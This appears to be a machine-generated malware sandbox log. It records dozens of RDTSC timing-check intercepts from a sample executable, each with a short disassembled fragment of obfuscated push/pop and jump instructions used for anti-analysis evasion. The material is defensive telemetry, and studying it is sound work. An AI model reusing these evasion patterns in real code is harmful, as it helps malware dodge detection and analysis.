Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44DCE second address: F44DD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44DD4 second address: F44DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262CBE4E90h 0x00000008 jnp 00007F262CBE4E86h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44DF2 second address: F44DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44DF6 second address: F44DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44DFA second address: F44E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44E07 second address: F44E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44E0B second address: F44E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4B3D5 second address: F4B3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E99h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4B3F7 second address: F4B406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4B406 second address: F4B420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F262CBE4E8Ch 0x0000000c jns 00007F262CBE4E86h 0x00000012 jc 00007F262CBE4EA0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F52F6E second address: F52F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F52F74 second address: F52F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F52F7F second address: F52F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F262D38FB0Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F52F93 second address: F52FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F262CBE4E8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F515CF second address: F515D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F515D3 second address: F515D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F560C8 second address: F560EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jo 00007F262D38FB06h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push ebx 0x00000014 jg 00007F262D38FB06h 0x0000001a jl 00007F262D38FB06h 0x00000020 pop ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F5CDDC second address: F5CDE6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F262CBE4E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F6AF7A second address: F6AFAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Ah 0x00000007 je 00007F262D38FB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F262D38FB0Ah 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edx 0x0000001c popad 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007F262D38FB06h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F6AFAC second address: F6AFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F6B100 second address: F6B118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F262D38FB08h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pushad 0x0000000f pushad 0x00000010 jnl 00007F262D38FB06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F6DF39 second address: F6DF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F262CBE4E97h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F6DF59 second address: F6DF71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F73B65 second address: F73B7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E90h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F73B7A second address: F73B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F73B80 second address: F73BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007F262CBE4E8Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jng 00007F262CBE4E86h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F73BA4 second address: F73BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E9519E second address: E951A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: E951A3 second address: E951B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F262D38FB0Dh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F7C44E second address: F7C454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F8342D second address: F83431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83431 second address: F83440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F262CBE4E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F835C2 second address: F835C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83717 second address: F8371E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F8371E second address: F83726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F839E9 second address: F839EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F839EF second address: F83A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 je 00007F262D38FB06h 0x0000000e jmp 00007F262D38FB0Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83A0C second address: F83A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83A18 second address: F83A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F262D38FB06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83A29 second address: F83A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83B77 second address: F83B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83B7D second address: F83B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83B81 second address: F83B8B instructions: 0x00000000 rdtsc 0x00000002 je 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83B8B second address: F83B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83B91 second address: F83BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB15h 0x00000007 jmp 00007F262D38FB16h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F83BC3 second address: F83BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F8745E second address: F8746D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 jno 00007F262D38FB06h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F8746D second address: F87473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F87473 second address: F87479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F8D992 second address: F8D996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FC17C9 second address: FC17CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FCB211 second address: FCB242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jl 00007F262CBE4E98h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F262CBE4E90h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F262CBE4E8Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FCB242 second address: FCB269 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F262D38FB0Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F262D38FB0Fh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FCB269 second address: FCB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FCB26F second address: FCB289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262D38FB15h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FDAD51 second address: FDAD6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FDA95A second address: FDA978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262D38FB11h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: FDA978 second address: FDA97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A137B second address: 10A1381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A1381 second address: 10A138B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A0242 second address: 10A0266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A03C9 second address: 10A03E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F262CBE4E86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F262CBE4E86h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A03E2 second address: 10A03F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F262D38FB12h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A03F2 second address: 10A03F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A03F8 second address: 10A03FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A03FC second address: 10A0406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F262CBE4E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A0C97 second address: 10A0CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F262D38FB15h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F262D38FB15h 0x00000011 jmp 00007F262D38FB10h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A0CD8 second address: 10A0CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A2AC2 second address: 10A2AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A2AC6 second address: 10A2AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A2AD2 second address: 10A2AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB16h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A4334 second address: 10A4338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A4338 second address: 10A433E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A433E second address: 10A4355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ch 0x00000007 push ecx 0x00000008 jnl 00007F262CBE4E86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A6C52 second address: 10A6C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A6EDD second address: 10A6F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d clc 0x0000000e popad 0x0000000f add dword ptr [ebp+12A02CEFh], edi 0x00000015 push 00000004h 0x00000017 or edx, 5C3DCF23h 0x0000001d push 8EA247D6h 0x00000022 pushad 0x00000023 push ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A6F13 second address: 10A6F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A725B second address: 10A725F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A725F second address: 10A7282 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F262D38FB11h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A7282 second address: 10A7299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007F262CBE4E86h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A7299 second address: 10A72A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F262D38FB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A72A3 second address: 10A72BB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F262CBE4E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A72BB second address: 10A72C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A87C0 second address: 10A87C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 10A87C6 second address: 10A87CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B00EC second address: 73B0101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0101 second address: 73B014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F262D38FB0Eh 0x0000000f mov ebx, dword ptr [eax+10h] 0x00000012 pushad 0x00000013 call 00007F262D38FB0Eh 0x00000018 mov eax, 74611791h 0x0000001d pop eax 0x0000001e pushad 0x0000001f mov di, DBD0h 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B014B second address: 73B014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B014F second address: 73B016C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B016C second address: 73B0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0172 second address: 73B0184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0184 second address: 73B0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
